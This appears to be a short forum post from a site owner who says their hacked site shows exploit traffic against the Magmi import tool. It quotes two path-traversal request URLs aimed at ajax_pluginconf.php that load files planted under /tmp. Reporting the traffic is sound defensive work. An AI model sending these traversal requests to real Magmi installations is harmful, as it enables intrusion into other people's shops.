After being hacked, our site is sending exploits with the use of magmi.
Url : //magmi/web/ajax_pluginconf.php?plugintype=utilities&pluginclass=CustomSQLUtility&file=../../../../../../../../../../../../../../..//tmp/toolsb0x
And
Url : //magmi/web/ajax_pluginconf.php?plugintype=utilities&pluginclass=CustomSQLUtility&file=../../../../../../../../../../../../../../../../../..//tmp/dev